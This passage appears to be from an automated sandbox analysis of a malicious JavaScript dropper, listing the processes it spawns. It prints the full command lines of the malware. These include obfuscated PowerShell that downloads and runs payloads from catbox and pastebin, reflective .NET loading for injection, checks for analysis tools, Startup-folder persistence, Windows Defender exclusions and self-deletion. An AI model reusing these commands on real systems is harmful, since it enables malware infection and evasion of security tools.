+ [char]66 + 'jAG8AZA' + [char]66 + 'pAG4AZwAgAD0AIA' + [char]66 + 'bAFMAeQ' + [char]66 + 'zAHQAZQ' + [char]66 + 'tAC4AVA' + [char]66 + 'lAHgAdAAuAEUAbg' + [char]66 + 'jAG8AZA' + [char]66 + 'pAG4AZw' + [char]66 + 'dADoAOg' + [char]66 + 'VAFQARgA4ACAAOwAkAHkAaw' + [char]66 + 'oAHkAbgAuAEQAbw' + [char]66 + '3AG4AbA' + [char]66 + 'vAGEAZA' + [char]66 + 'GAGkAbA' + [char]66 + 'lACgAJA' + [char]66 + 'uAGcAcw' + [char]66 + 'kAHAALAAgACgAJA' + [char]66 + 'mAGIASw' + [char]66 + 'OAFkAIAArACAAJw' + [char]66 + 'cAFUAcA' + [char]66 + '3AGkAbgAuAG0Acw' + [char]66 + '1ACcAKQAgACkAIAA7ACQAZg' + [char]66 + 'WAEQA
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$LTkZZ = $host.Version.Major.Equals(2);If ( $LTkZZ ) {$fbKNY = ([System.IO.Path]::GetTempPath());del ($fbKNY + '\Upwin.msu');$ngsdp = 'https://files.catbox.moe/sakuuo.msu';$menos = 'https://files.catbox.moe/6sdjc5.msu';$EhgVw = $env:PROCESSOR_ARCHITECTURE.Contains('64');if ( $EhgVw ) {$ngsdp = $menos ;}else {$ngsdp = ($ngsdp) ;};$ykhyn = ( New-Object Net.WebClient ) ;$ykhyn.Encoding = [System.Text.Encoding]::UTF8 ;$ykhyn.DownloadFile($ngsdp, ($fbKNY + '\Upwin.msu') ) ;$fVDsW = ( 'C:\Users\' + [Environment]::UserName );$bJTXj = ( $fbKNY + '\Upwin.msu' ) ; powershell.exe wusa.exe $bJTXj /quiet /norestart ; Copy-Item 'C:\Users\user\Downloads\F-2025-0855\F-2025-0855.js' -Destination ( $fVDsW + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup' ) -force ;powershell.exe -command 'sleep 180'; shutdown.exe /r /t 0 /f }else {[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true} ;[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12 ;if((get-process 'Wireshark','apateDNS','analyze' -ea SilentlyContinue) -eq $Null){ } else{ Restart-Computer -force ; exit ; } ;$Stringbase;Function BaseMy{;$EATVh = [System.Text.Encoding]::UTF8.GetString([system.Convert]::FromBase64String($Stringbase));return $EATVh;};$nhqvr = ('https://pastebin.com/raw/bYrRPs5M' );$cZNqf = ( [System.IO.Path]::GetTempPath() + 'dll01.txt');$webClient = New-Object System.Net.WebClient ;$vfjrD = $webClient.DownloadString( $nhqvr ) ;$Stringbase = $vfjrD; $vfjrD = BaseMy;$vfjrD | Out-File -FilePath $cZNqf -Encoding 'UTF8' -force ;$lyjkG = ( [System.IO.Path]::GetTempPath() + 'dll02.txt') ;$BKrSR = New-Object System.Net.WebClient ;$BKrSR.Encoding = [System.Text.Encoding]::UTF8 ;$nFuQG = ( Get-Content -Path $cZNqf ) ;$lDMXc = $BKrSR.DownloadData( $nFuQG ) ;$SXRcf = [System.Text.Encoding]::UTF8.GetString($lDMXc);$SXRcf | Out-File -FilePath $lyjkG -force ;$EuTZA = '$tfYIo = ( [System.IO.Path]::GetTempPath() + ''dll02.txt'') ;$ryaeG = (Get-Content -Path $tfYIo -Encoding UTF8);' ;$EuTZA += '[Byte[]] $EATVh = [system.Convert]::FromBase64String( $ryaeG.replace(''?:?'',''A'') ) ;' ;$EuTZA += '[System.AppDomain]:' + ':CurrentDomain.Load( $EATVh ).' ;$EuTZA += 'GetType( ''ClassLibrary3.Class1'' ).GetM' ;$EuTZA += 'ethod( ''prFVI'' ).Invoke( $null , [object[]] ( ''txt.5202-YzX-dAeRpS-MeR/moc.seplaenohreruemed//:sptth'' , ''C:\Users\user\Downloads\F-2025-0855\F-2025-0855.js'' , ''D DDc:\windows\microsoft.net\framework\v4.0.30319\addinprocess32'' ) );';$XvCTi = ([System.IO.Path]::GetTempPath() + 'dll03.ps1') ;$EuTZA | Out-File -FilePath $XvCTi -force ;powershell -ExecutionPolicy Bypass -File $XvCTi ;};"
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $WgkXZ = 'JA' + [char]66 + 'MAFQAaw' + [char]66 + 'aAFoAIAA9ACAAJA' + [char]66 + 'oAG8Acw' + [char]66 + '0AC4AVg' + [char]66 + 'lAHIAcw' + [char]66 + 'pAG8AbgAuAE0AYQ' + [char]66 + 'qAG8AcgAuAEUAcQ' + [char]66 + '1AGEAbA' + [char]66 + 'zACgAMgApADsASQ' + [char]66 + 'mACAAKAAgACQATA' + [char]66 + 'UAGsAWg' + [char]66 + 'aACAAKQAgAHsAJA' + [char]66 + 'mAGIASw' + [char]66 + 'OAFkAIAA9ACAAKA' + [char]66 + 'bAFMAeQ' + [char]66 + 'zAHQAZQ' + [char]66 + 'tAC4ASQ' + [char]66 + 'PAC4AUA' + [char]66 + 'hAHQAaA' + [char]66 + 'dADoAOg' + [char]66 + 'HAGUAdA' + [char]66 + 'UAGUAbQ' + [char]66 + 'wAFAAYQ' + [char]66 + '0AGgAKAApACkAOw' + [char]66 + 'kAGUAbAAgACgAJA' + [char]66 + 'mAGIASw' + [char]66 + 'OAFkAIAArACAAJw' + [char]66 + 'cAFUAcA' + [char]66 + '3AGkAbgAuAG0Acw' + [char]66 + '1ACcAKQA7ACQAbg' + [char]66 + 'nAHMAZA' + [char]66 + 'wACAAPQAgACcAaA' + [char]66 + '0AHQAcA' + [char]66 + 'zADoALwAvAGYAaQ' + [char]66 + 'sAGUAcwAuAGMAYQ' + [char]66 + '0AGIAbw' + [char]66 + '4AC4AbQ' + [char]66 + 'vAGUALw' + [char]66 + 'zAGEAaw' + [char]66 + '1AHUAbwAuAG0Acw' + [char]66 + '1ACcAOwAkAG0AZQ' + [char]66 + 'uAG8AcwAgAD0AIAAnAGgAdA' + [char]66 + '0AHAAcwA6AC8ALw' + [char]66 + 'mAGkAbA' + [char]66 + 'lAHMALg' + [char]66 + 'jAGEAdA' + [char]66 + 'iAG8AeAAuAG0Abw' + [char]66 + 'lAC8ANg' + [char]66 + 'zAGQAag' + [char]66 + 'jADUALg' + [char]66 + 'tAHMAdQAnADsAJA' + [char]66 + 'FAGgAZw' + [char]66 + 'WAHcAIAA9ACAAJA' + [char]66 + 'lAG4AdgA6AFAAUg' + [char]66 + 'PAEMARQ' + [char]66 + 'TAFMATw' + [char]66 + 'SAF8AQQ' + [char]66 + 'SAEMASA' + [char]66 + 'JAFQARQ' + [char]66 + 'DAFQAVQ' + [char]66 + 'SAEUALg' + [char]66 + 'DAG8Abg' + [char]66 + '0AGEAaQ' + [char]66 + 'uAHMAKAAnADYANAAnACkAOw' + [char]66 + 'pAGYAIAAoACAAJA' + [char]66 + 'FAGgAZw' + [char]66 + 'WAHcAIAApACAAewAkAG4AZw' + [char]66 + 'zAGQAcAAgAD0AIAAkAG0AZQ' + [char]66 + 'uAG8AcwAgADsAfQ' + [char]66 + 'lAGwAcw' + [char]66 + 'lACAAewAkAG4AZw' + [char]66 + 'zAGQAcAAgAD0AIAAoACQAbg' + [char]66 + 'nAHMAZA' + [char]66 + 'wACkAIAA7AH0AOwAkAHkAaw' + [char]66 + 'oAHkAbgAgAD0AIAAoACAATg' + [char]66 + 'lAHcALQ' + [char]66 + 'PAGIAag' + [char]66 + 'lAGMAdAAgAE4AZQ' + [char]66 + '0AC4AVw' + [char]66 + 'lAGIAQw' + [char]66 + 'sAGkAZQ' + [char]66 + 'uAHQAIAApACAAOwAkAHkAaw' + [char]66 + 'oAHkAbgAuAEUAbg' + [char]66 + 'jAG8AZA' + [char]66 + 'pAG4AZwAgAD0AIA' + [char]66 + 'bAFMAeQ' + [char]66 + 'zAHQAZQ' + [char]66 + 'tAC4AVA' + [char]66 + 'lAHgAdAAuAEUAbg' + [char]66 + 'jAG8AZA' + [char]66 + 'pAG4AZw' + [char]66 + 'dADoAOg' + [char]66 + 'VAFQARgA4ACAAOwAkAHkAaw' + [char]66 + 'oAHkAbgAuAEQAbw' + [char]66 + '3AG4AbA' + [char]66 + 'vAGEAZA' + [char]66 + 'GAGkAbA' + [char]66 + 'lACgAJA' + [char]66 + 'uAGcAcw' + [char]66 + 'kAHAALAAgACgAJA' + [char]66 + 'mAGIASw' + [char]66 + 'OAFkAIAArACAAJw' + [char]66 + 'cAFUAcA' + [char]66 + '3AGkAbgAuAG0Acw' + [char]66 + '1ACcAKQAgACkAIAA7ACQAZg' + [char]66 + 'WAEQA
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\Temp\dll03.ps1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c ping 127.0.0.1 -n 1 & del "C:\Users\user\AppData\Local\Temp\DLL01.txt"
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c ping 127.0.0.1 -n 1 & del "C:\Users\user\AppData\Local\Temp\DLL02.txt"
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c ping 127.0.0.1 -n 1 & del "C:\Users\user\AppData\Local\Temp\DLL31.ps1"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping 127.0.0.1 -n 1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping 127.0.0.1 -n 1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping 127.0.0.1 -n 1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c mkdir "C:\Users\user\AppData\LocalLow\Daft Sytem (x86)\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\"
              Source: unknownProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\Downloads\F-2025-0855\F-2025-0855.js"
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell $S = 'C:\Users\user\AppData\LocalLow\Daft Sytem (x86)\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\' ; Add-MpPreference -ExclusionPath $S -force ;
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell $S = 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\' ; Add-MpPreference -ExclusionPath $S -force ;
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $WgkXZ = 'JA' + [char]66 + 'MAFQAaw' + [char]66 + 'aAFoAIAA9ACAAJA' + [char]66 + 'oAG8Acw' + [char]66 + '0AC4AVg' + [char]66 + 'lAHIAcw' + [char]66 + 'pAG8AbgAuAE0AYQ' + [char]66 + 'qAG8AcgAuAEUAcQ' + [char]66 + '1AGEAbA' + [char]66 + 'zACgAMgApADsASQ' + [char]66 + 'mACAAKAAgACQATA' + [char]66 + 'UAGsAWg' + [char]66 + 'aACAAKQAgAHsAJA' + [char]66 + 'mAGIASw' + [char]66 + 'OAFkAIAA9ACAAKA' + [char]66 + 'bAFMAeQ' + [char]66 + 'zAHQAZQ' + [char]66 + 'tAC4ASQ' + [char]66 + 'PAC4AUA' + [char]66 + 'hAHQAaA' + [char]66 + 'dADoAOg' + [char]66 + 'HAGUAdA' + [char]66 + 'UAGUAbQ' + [char]66 + 'wAFAAYQ' + [char]66 + '0AGgAKAApACkAOw' + [char]66 + 'kAGUAbAAgACgAJA' + [char]66 + 'mAGIASw' + [char]66 + 'OAFkAIAArACAAJw' + [char]66 + 'cAFUAcA' + [char]66 + '3AGkAbgAuAG0Acw' + [char]66 + '1ACcAKQA7ACQAbg' + [char]66 + 'nAHMAZA' + [char]66 + 'wACAAPQAgACcAaA' + [char]66 + '0AHQAcA' + [char]66 + 'zADoALwAvAGYAaQ' + [char]66 + 'sAGUAcwAuAGMAYQ' + [char]66 + '0AGIAbw' + [char]66 + '4AC4AbQ' + [char]66 + 'vAGUALw' + [char]66 + 'zAGEAaw' + [char]66 + '1AHUAbwAuAG0Acw' + [char]66 + '1ACcAOwAkAG0AZQ' + [char]66 + 'uAG8AcwAgAD0AIAAnAGgAdA' + [char]66 + '0AHAAcwA6AC8ALw' + [char]66 + 'mAGkAbA' + [char]66 + 'lAHMALg' + [char]66 + 'jAGEAdA' + [char]66 + 'iAG8AeAAuAG0Abw' + [char]66 + 'lAC8ANg' + [char]66 + 'zAGQAag' + [char]66 + 'jADUALg' + [char]66 + 'tAHMAdQAnADsAJA' + [char]66 + 'FAGgAZw' + [char]66 + 'WAHcAIAA9ACAAJA' + [char]66 + 'lAG4AdgA6AFAAUg' + [char]66 + 'PAEMARQ' + [char]66 + 'TAFMATw' + [char]66 + 'SAF8AQQ' + [char]66 + 'SAEMASA' + [char]66 + 'JAFQARQ' + [char]66 + 'DAFQAVQ' + [char]66 + 'SAEUALg' + [char]66 + 'DAG8Abg' + [char]66 + '0AGEAaQ' + [char]66 + 'uAHMAKAAnADYANAAnACkAOw' + [char]66 + 'pAGYAIAAoACAAJA' + [char]66 + 'FAGgAZw' + [char]66 + 'WAHcAIAApACAAewAkAG4AZw' + [char]66 + 'zAGQAcAAgAD0AIAAkAG0AZQ' + [char]66 + 'uAG8AcwAgADsAfQ' + [char]66 + 'lAGwAcw' + [char]66 + 'lACAAewAkAG4AZw' + [char]66 + 'zAGQAcAAgAD0AIAAoACQAbg' + [char]66 + 'nAHMAZA' + [char]66 + 'wACkAIAA7AH0AOwAkAHkAaw' + [char]66 + 'oAHkAbgAgAD0AIAAoACAATg' + [char]66 + 'lAHcALQ' + [char]66 + 'PAGIAag' + [char]66 + 'lAGMAdAAgAE4AZQ' + [char]66 + '0AC4AVw' + [char]66 + 'lAGIAQw' + [char]66 + 'sAGkAZQ' + [char]66 + 'uAHQAIAApACAAOwAkAHkAaw' + [char]66 + 'oAHkAbgAuAEUAbg' + [char]66 + 'jAG8AZA' + [char]66 + 'pAG4AZwAgAD0AIA' + [char]66 + 'bAFMAeQ' + [char]66 + 'zAHQAZQ' + [char]66 + 'tAC4AVA' + [char]66 + 'lAHgAdAAuAEUAbg' + [char]66 + 'jAG8AZA' + [char]66 + 'pAG4AZw' + [char]66 + 'dADoAOg' + [char]66 + 'VAFQARgA4ACAAOwAkAHkAaw' + [char]66 + 'oAHkAbgAuAEQAbw' + [char]66 + '3AG4AbA' + [char]66 + 'vAGEAZA' + [char]66 + 'GAGkAbA' + [char]66 + 'lACgAJA' + [char]66 + 'uAGcAcw' + [char]66 + 'kAHAALAAgACgAJA' + [char]66 + 'mAGIASw' + [char]66 + 'OAFkAIAArACAAJw' + [char]66 + 'cAFUAcA' + [char]66 + '3AGkAbgAuAG0Acw' + [char]66 + '1ACcAKQAgACkAIAA7ACQAZg' + [char]66 + 'WAEQA
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$LTkZZ = $host.Version.Major.Equals(2);If ( $LTkZZ ) {$fbKNY = ([System.IO.Path]::GetTempPath());del ($fbKNY + '\Upwin.msu');$ngsdp = 'https://files.catbox.moe/sakuuo.msu';$menos = 'https://files.catbox.moe/6sdjc5.msu';$EhgVw = $env:PROCESSOR_ARCHITECTURE.Contains('64');if ( $EhgVw ) {$ngsdp = $menos ;}else {$ngsdp = ($ngsdp) ;};$ykhyn = ( New-Object Net.WebClient ) ;$ykhyn.Encoding = [System.Text.Encoding]::UTF8 ;$ykhyn.DownloadFile($ngsdp, ($fbKNY + '\Upwin.msu') ) ;$fVDsW = ( 'C:\Users\' + [Environment]::UserName );$bJTXj = ( $fbKNY + '\Upwin.msu' ) ; powershell.exe wusa.exe $bJTXj /quiet /norestart ; Copy-Item 'C:\Users\user\Downloads\F-2025-0855\F-2025-0855.js' -Destination ( $fVDsW + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup' ) -force ;powershell.exe -command 'sleep 180'; shutdown.exe /r /t 0 /f }else {[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true} ;[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12 ;if((get-process 'Wireshark','apateDNS','analyze' -ea SilentlyContinue) -eq $Null){ } else{ Restart-Computer -force ; exit ; } ;$Stringbase;Function BaseMy{;$EATVh = [System.Text.Encoding]::UTF8.GetString([system.Convert]::FromBase64String($Stringbase));return $EATVh;};$nhqvr = ('https://pastebin.com/raw/bYrRPs5M' );$cZNqf = ( [System.IO.Path]::GetTempPath() + 'dll01.txt');$webClient = New-Object System.Net.WebClient ;$vfjrD = $webClient.DownloadString( $nhqvr ) ;$Stringbase = $vfjrD; $vfjrD = BaseMy;$vfjrD | Out-File -FilePath $cZNqf -Encoding 'UTF8' -force ;$lyjkG = ( [System.IO.Path]::GetTempPath() + 'dll02.txt') ;$BKrSR = New-Object System.Net.WebClient ;$BKrSR.Encoding = [System.Text.Encoding]::UTF8 ;$nFuQG = ( Get-Content -Path $cZNqf ) ;$lDMXc = $BKrSR.DownloadData( $nFuQG ) ;$SXRcf = [System.Text.Encoding]::UTF8.GetString($lDMXc);$SXRcf | Out-File -FilePath $lyjkG -force ;$EuTZA = '$tfYIo = ( [System.IO.Path]::GetTempPath() + ''dll02.txt'') ;$ryaeG = (Get-Content -Path $tfYIo -Encoding UTF8);' ;$EuTZA += '[Byte[]] $EATVh = [system.Convert]::FromBase64String( $ryaeG.replace(''?:?'',''A'') ) ;' ;$EuTZA += '[System.AppDomain]:' + ':CurrentDomain.Load( $EATVh ).' ;$EuTZA += 'GetType( ''ClassLibrary3.Class1'' ).GetM' ;$EuTZA += 'ethod( ''prFVI'' ).Invoke( $null , [object[]] ( ''txt.5202-YzX-dAeRpS-MeR/moc.seplaenohreruemed//:sptth'' , ''C:\Users\user\Downloads\F-2025-0855\F-2025-0855.js'' , ''D DDc:\windows\microsoft.net\framework\v4.0.30319\addinprocess32'' ) );';$XvCTi = ([System.IO.Path]::GetTempPath() + 'dll03.ps1') ;$EuTZA | Out-File -FilePath $XvCTi -force ;powershell -ExecutionPolicy Bypass -File $XvCTi ;};"
              Source: unknownProcess created: C:\Windows\System32\OpenWith.exe C:\Windows\system32\OpenWith.exe -Embedding
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c ping 127.0.0.1 -n 1 & copy "C:\Users\user\Downloads\F-2025-0855\F-2025-0855.js" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\F-2025-0855.js"
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c ping 127.0.0.1 -n C:\Users\user\Downloads\F-2025-0855\F-2025-0855.js & del "1"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping 127.0.0.1 -n 1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping 127.0.0.1 -n C:\Users\user\Downloads\F-2025-0855\F-2025-0855.js
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\Temp\dll03.ps1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c ping 127.0.0.1 -n 1 & del "C:\Users\user\AppData\Local\Temp\DLL01.txt"
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c ping 127.0.0.1 -n 1 & del "C:\Users\user\AppData\Local\Temp\DLL02.txt"
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c ping 127.0.0.1 -n 1 & del "C:\Users\user\AppData\Local\Temp\DLL31.ps1"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping 127.0.0.1 -n 1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping 127.0.0.1 -n 1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping 127.0.0.1 -n 1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell $S = 'C:\Users\user\AppData\LocalLow\Daft Sytem (x86)\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\' ; Add-MpPreference -ExclusionPath $S -force ;
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell $S = 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\' ; Add-MpPreference -ExclusionPath $S -force ;
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c del "C:\Users\user\Downloads\F-2025-0855\F-2025-0855.js"
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$LTkZZ = $host.Version.Major.Equals(2);If ( $LTkZZ ) {$fbKNY = ([System.IO.Path]::GetTempPath());del ($fbKNY + '\Upwin.msu');$ngsdp = 'https://files.catbox.moe/sakuuo.msu';$menos = 'https://files.catbox.moe/6sdjc5.msu';$EhgVw = $env:PROCESSOR_ARCHITECTURE.Contains('64');if ( $EhgVw ) {$ngsdp = $menos ;}else {$ngsdp = ($ngsdp) ;};$ykhyn = ( New-Object Net.WebClient ) ;$ykhyn.Encoding = [System.Text.Encoding]::UTF8 ;$ykhyn.DownloadFile($ngsdp, ($fbKNY + '\Upwin.msu') ) ;$fVDsW = ( 'C:\Users\' + [Environment]::UserName );$bJTXj = ( $fbKNY + '\Upwin.msu' ) ; powershell.exe wusa.exe $bJTXj /quiet /norestart ; Copy-Item 'C:\Users\user\Downloads\F-2025-0855\F-2025-0855.js' -Destination ( $fVDsW + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup' ) -force ;powershell.exe -command 'sleep 180'; shutdown.exe /r /t 0 /f }else {[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true} ;[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12 ;if((get-process 'Wireshark','apateDNS','analyze' -ea SilentlyContinue) -eq $Null){ } else{ Restart-Computer -force ; exit ; } ;$Stringbase;Function BaseMy{;$EATVh = [System.Text.Encoding]::UTF8.GetString([system.Convert]::FromBase64String($Stringbase));return $EATVh;};$nhqvr = ('https://pastebin.com/raw/bYrRPs5M' );$cZNqf = ( [System.IO.Path]::GetTempPath() + 'dll01.txt');$webClient = New-Object System.Net.WebClient ;$vfjrD = $webClient.DownloadString( $nhqvr ) ;$Stringbase = $vfjrD; $vfjrD = BaseMy;$vfjrD | Out-File -FilePath $cZNqf -Encoding 'UTF8' -force ;$lyjkG = ( [System.IO.Path]::GetTempPath() + 'dll02.txt') ;$BKrSR = New-Object System.Net.WebClient ;$BKrSR.Encoding = [System.Text.Encoding]::UTF8 ;$nFuQG = ( Get-Content -Path $cZNqf ) ;$lDMXc = $BKrSR.DownloadData( $nFuQG ) ;$SXRcf = [System.Text.Encoding]::UTF8.GetString($lDMXc);$SXRcf | Out-File -FilePath $lyjkG -force ;$EuTZA = '$tfYIo = ( [System.IO.Path]::GetTempPath() + ''dll02.txt'') ;$ryaeG = (Get-Content -Path $tfYIo -Encoding UTF8);' ;$EuTZA += '[Byte[]] $EATVh = [system.Convert]::FromBase64String( $ryaeG.replace(''?:?'',''A'') ) ;' ;$EuTZA += '[System.AppDomain]:' + ':CurrentDomain.Load( $EATVh ).' ;$EuTZA += 'GetType( ''ClassLibrary3.Class1'' ).GetM' ;$EuTZA += 'ethod( ''prFVI'' ).Invoke( $null , [object[]] ( ''txt.5202-YzX-dAeRpS-MeR/moc.seplaenohreruemed//:sptth'' , ''C:\Users\user\Downloads\F-2025-0855\F-2025-0855.js'' , ''D DDc:\windows\microsoft.net\framework\v4.0.30319\addinprocess32'' ) );';$XvCTi = ([System.IO.Path]::GetTempPath() + 'dll03.ps1') ;$EuTZA | Out-File -FilePath $XvCTi -force ;powershell -ExecutionPolicy Bypass -File $XvCTi ;};"
              Source: C:\Windows\System32\OpenWith.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" -osint -url "C:\Users\user\Downloads\F-2025-0855\F-2025-0855.js"
              Source: C:\Program Files\Mozilla Firefox\firefox.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" -osint -url C:\Users\user\Downloads\F-2025-0855\F-2025-0855.js
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c "powershell.exe -WindowStyle Hidden Start-Sleep -Seconds 1 ; powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -file 'C:\Users\user\AppData\LocalLow\Daft Sytem (x86)\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\oqesy.ps1'"
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c "powershell.exe -WindowStyle Hidden Start-Sleep -Seconds 1 ; powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -file 'C:\Users\user\AppData\LocalLow\Daft Sytem (x86)\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\wbhes.ps1'"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden Start-Sleep -Seconds 1 ; powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -file 'C:\Users\user\AppData\LocalLow\Daft Sytem (x86)\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\oqesy.ps1'
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\Temp\dll03.ps1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden Start-Sleep -Seconds 1 ; powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -file 'C:\Users\user\AppData\LocalLow\Daft Sytem (x86)\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\wbhes.ps1'
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -ExecutionPolicy Bypass -File "C:\Users\user\AppData\LocalLow\Daft Sytem (x86)\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\idksg.ps1"
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c del "C:\Users\user\Downloads\F-2025-0855\F-2025-0855.js"
              Source: C:\Program Files\Mozilla Firefox\firefox.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2272 -parentBuildID 20230927232528 -prefsHandle 2216 -prefMapHandle 2200 -prefsLen 25250 -prefMapSize 237879 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {a4ecd2f9-4327-4118-b575-326c3d8b529d} 7712 "\\.\pipe\gecko-crash-server-pipe.7712" 290e916ff10 socket
